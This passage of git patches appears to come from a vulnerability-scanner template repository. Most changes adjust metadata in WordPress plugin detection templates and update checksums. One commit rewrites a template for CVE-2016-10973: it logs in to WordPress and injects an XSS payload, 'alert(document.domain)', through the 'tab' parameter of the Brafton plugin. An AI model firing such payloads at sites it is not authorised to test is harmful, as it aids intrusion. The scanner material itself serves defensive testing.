wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1c25b6f488..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b36317acd8..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 5eb35dd17e..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ceb2b8d600..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 5088d51eddf7f0e1fda47f7c8205f5f9fa56f483 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 10 Jul 2023 10:08:10 +0530 Subject: [PATCH 554/609] error fix --- network/cves/2016/CVE-2016-3510.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/cves/2016/CVE-2016-3510.yaml b/network/cves/2016/CVE-2016-3510.yaml index ed5150ef7e..ede5d49971 100644 --- a/network/cves/2016/CVE-2016-3510.yaml +++ b/network/cves/2016/CVE-2016-3510.yaml @@ -13,7 +13,7 @@ info: cvss-score: 9.8 cve-id: CVE-2016-3510 cwe-id: CWE-119 - epss-score: 0.0162000000.016200000 + epss-score: 0.0162000000 metadata: max-request: 2 verified: true From a11f62317dbb3c0cfabe3668f917b0e3a4f5350a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 10 Jul 2023 10:38:33 +0530 Subject: [PATCH 555/609] updated req,matchers --- http/cves/2016/CVE-2016-10973.yaml | 23 +++++++++++++++++------ 1 file changed, 17 insertions(+), 6 deletions(-) diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml index eef70daddc..f92b9598ff 100644 --- a/http/cves/2016/CVE-2016-10973.yaml +++ b/http/cves/2016/CVE-2016-10973.yaml @@ -15,18 +15,29 @@ info: cve-id: CVE-2016-10973 cwe-id: CWE-79 metadata: - max-request: 1 - tags: cve,cve2016,wordpress,wp,wp-plugin,xss,brafton + max-request: 2 + verified: true + tags: cve,cve2016,wordpress,wp,wp-plugin,xss,brafton,authenticated http: - - method: GET - path: - - "{{BaseURL}}/wp-admin/admin.php?page=BraftonArticleLoader&tab=alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83))" + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true matchers: - type: dsl dsl: - 'status_code_2 == 200' - - 'contains(body_2, "alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83))")' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "tab = alert(document.domain);")' - 'contains(body_2, "Brafton Article Loader")' condition: and From 7289fa7f29e3e8c075054a572d2c7f8e34b692bb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 05:24:43 +0000 Subject: [PATCH 556/609] Auto Generated New Template Addition List [Mon Jul 10 05:24:42 UTC 2023] :robot: --- .new-additions | 3 --- 1 file changed, 3 deletions(-) diff --git a/.new-additions b/.new-additions index 744c179594..e69de29bb2 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +0,0 @@ -http/cves/2022/CVE-2022-46073.yaml -http/cves/2023/CVE-2023-36934.yaml -http/exposed-panels/sunbird-dcim-panel.yaml From 9e00503f13482cdab3a7c48161fdc01637a2fe64 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 05:25:13 +0000 Subject: [PATCH 557/609] Auto Generated Templates Checksum [Mon Jul 10 05:25:13 UTC 2023] :robot: --- templates-checksum.txt | 36 ++++++++++++++++++------------------ 1 file changed, 18 insertions(+), 18 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 731bd6f940..4a97b19d2e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2,14 +2,14 @@ CODE_OF_CONDUCT.md:5c581b341cecd31ea4a275098ec84be9951f1593 CONTRIBUTING.md:a280fa8badd8622a481e1bb7f492dd82ac05ea71 LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7 -README.md:3a8c21530bafd4fb8348772558f2cd9b9d54a2fb +README.md:51ebb98375e4d526314565c5ecb34d36d4e13d19 README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26 -TEMPLATES-STATS.json:e268bd37316310244916d616fd87c09b09033472 -TEMPLATES-STATS.md:97fbc54da963e2a9d0b1aedd747203808e78dddb -TOP-10.md:d23a36ee425b3324a3837f19b9ed7971a950c597 +TEMPLATES-STATS.json:7124209614af6f4ec3e30658be306efe87a09d19 +TEMPLATES-STATS.md:4f2deb87b601b234429cf10252ba4c2b9fc4da62 +TOP-10.md:dbe627b6ea3081d74929073a986a86c4e82b4130 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 -cves.json:513aa6b44cb33f11853ae1a4ab614462dc4464a5 -cves.json-checksum.txt:ef837420c6bf1801c70070d362ced53a45fb7b4e +cves.json:bd710463bea4e310c9dbef8cffd55c5732f0234b +cves.json-checksum.txt:e4554db6bd79f6d36493eaab72348980145431ff dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161 dns/cname-fingerprint.yaml:f7200ff1f3b3f96a7a92ddd6b49e5e5abe1d2377 @@ -2362,7 +2362,7 @@ http/cves/2023/CVE-2023-35844.yaml:6d63343cd1d397fc2169be8459ea294c22008817 http/cves/2023/CVE-2023-36287.yaml:5eb1daacf8748242791657809bb6e463b71a48f6 http/cves/2023/CVE-2023-36289.yaml:71857d7c8d924ea71d0cea573f83c4879f951555 http/cves/2023/CVE-2023-36346.yaml:9ee6abfd347367ffb335b101ce3c283a34d6ec3c -http/cves/2023/CVE-2023-36934.yaml:1c78c1cd52976f7792301274210509404f1f715a +http/cves/2023/CVE-2023-36934.yaml:e4b3d96bc765b8af502a147f299f90e088f6f4d5 http/default-logins/3com/3com-nj2000-default-login.yaml:c00b706cfbbb60a4377ed00240d60f1b4679f18d http/default-logins/UCMDB/ucmdb-default-login.yaml:65a8ff54c063a35e251409ed8bfd1a93e50d42c2 http/default-logins/abb/cs141-default-login.yaml:8914cccfee6dfcbfbb632cf088ca7a33823561d6 @@ -6456,21 +6456,21 @@ http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml:d81ad79707b746a46d8dbf3825df18 http/vulnerabilities/zyxel/unauth-ztp-ping.yaml:61b1a8c05002d6ae6d87cc583301691b2cca06ab network/backdoor/backdoored-zte.yaml:1f2965cc0dedda1f861b7835e5778923b08c6a5f network/backdoor/vsftpd-backdoor.yaml:e3bd4879b5595dae69e0610aed33f24c77c28232 -network/cves/2001/CVE-2001-1473.yaml:1b508a5adba955e833c48e50e2b2eac33282a525 -network/cves/2011/CVE-2011-2523.yaml:7547cb75a9cca206a0e70cf2a9c2688c0d96b715 -network/cves/2015/CVE-2015-3306.yaml:7a79918776523f2c5e1c5c6af3bf7076d3172b2a -network/cves/2016/CVE-2016-2004.yaml:a37bdd523ca82d4b760058896e54ac583b7c1818 -network/cves/2016/CVE-2016-3510.yaml:cb0d9aa9f82da78481cc754b5d49606f536c8b2e +network/cves/2001/CVE-2001-1473.yaml:ffd09a4f5343bc0d03aed43863b305f3aa94e546 +network/cves/2011/CVE-2011-2523.yaml:0d5116d810cabe7e2e28dc3eba2da3c99a0df9e3 +network/cves/2015/CVE-2015-3306.yaml:e9da0447e9c59023c7ff8cad0dfdc3ee3c84752c +network/cves/2016/CVE-2016-2004.yaml:45601134133458813c5e25166aacbef8597870a3 +network/cves/2016/CVE-2016-3510.yaml:ae196c07ebf33e66774c9c44a9092e60a403a897 network/cves/2017/CVE-2017-3881.yaml:997372695fa85bd4b02e1652f223af173bd813f6 -network/cves/2017/CVE-2017-5645.yaml:73fa585ece4f10781721c99f894c4210175ad9df -network/cves/2018/CVE-2018-2628.yaml:fd4e8a9bd582eacb770f5b403ecc961cd357d976 -network/cves/2018/CVE-2018-2893.yaml:b72472a4dd5932b5f0accf841ea0dab2a922884e -network/cves/2020/CVE-2020-11981.yaml:8cf01204e15f9205225a407e3573d04f1a3ebd7d +network/cves/2017/CVE-2017-5645.yaml:abec78635527ce97a1703d852c705d776e9ee13f +network/cves/2018/CVE-2018-2628.yaml:4989ff19e707fd47c12143534605ee1188e44d58 +network/cves/2018/CVE-2018-2893.yaml:fdbd127b0d48f0775826934859a18963a9f61d97 +network/cves/2020/CVE-2020-11981.yaml:0645b9e3ec0a8d000ff131fbeeb19e5ae816c530 network/cves/2020/CVE-2020-1938.yaml:f42c5ab49582e8cfb2ef258c578b687c67556a9d network/cves/2020/CVE-2020-7247.yaml:fa40a1f64718f3297ab0c77fb82624604d296237 network/cves/2021/CVE-2021-44521.yaml:9d7d5fafd4af27eec6c672509604c87559be2cbd network/cves/2022/CVE-2022-0543.yaml:36be19795b4899c702c6819faecefae477f5b0c9 -network/cves/2022/CVE-2022-24706.yaml:c9c9a10852d08107d5818e3ca37d716ebc9936e1 +network/cves/2022/CVE-2022-24706.yaml:bfd5b66336ae7a25cbce899dcef80fe8ce80a68f network/cves/2022/CVE-2022-31793.yaml:359508b9480ede53286543c34d407e4173562614 network/cves/2023/CVE-2023-33246.yaml:6cd8eb482b6199a6c7298a99ae2bb0e41f2c4c3f network/default-login/ftp-anonymous-login.yaml:a674622b755c4a2eb05e535f714ba90eaa1a9829 @@ -6578,7 +6578,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:322a37f3ee018de224f277e9cee7a397b3d98bbd +templates-checksum.txt:f8519e525e52310bb205374c459cb94ddf592b1c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 74eec1301cac4754006e31909437618fc7fb0744 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 05:27:05 +0000 Subject: [PATCH 558/609] TemplateMan Update [Mon Jul 10 05:27:05 UTC 2023] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cloudflare.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-and-footer-scripts.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + http/technologies/wordpress/plugins/loginpress.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + http/technologies/wordpress/plugins/photo-gallery.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 200 files changed, 200 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 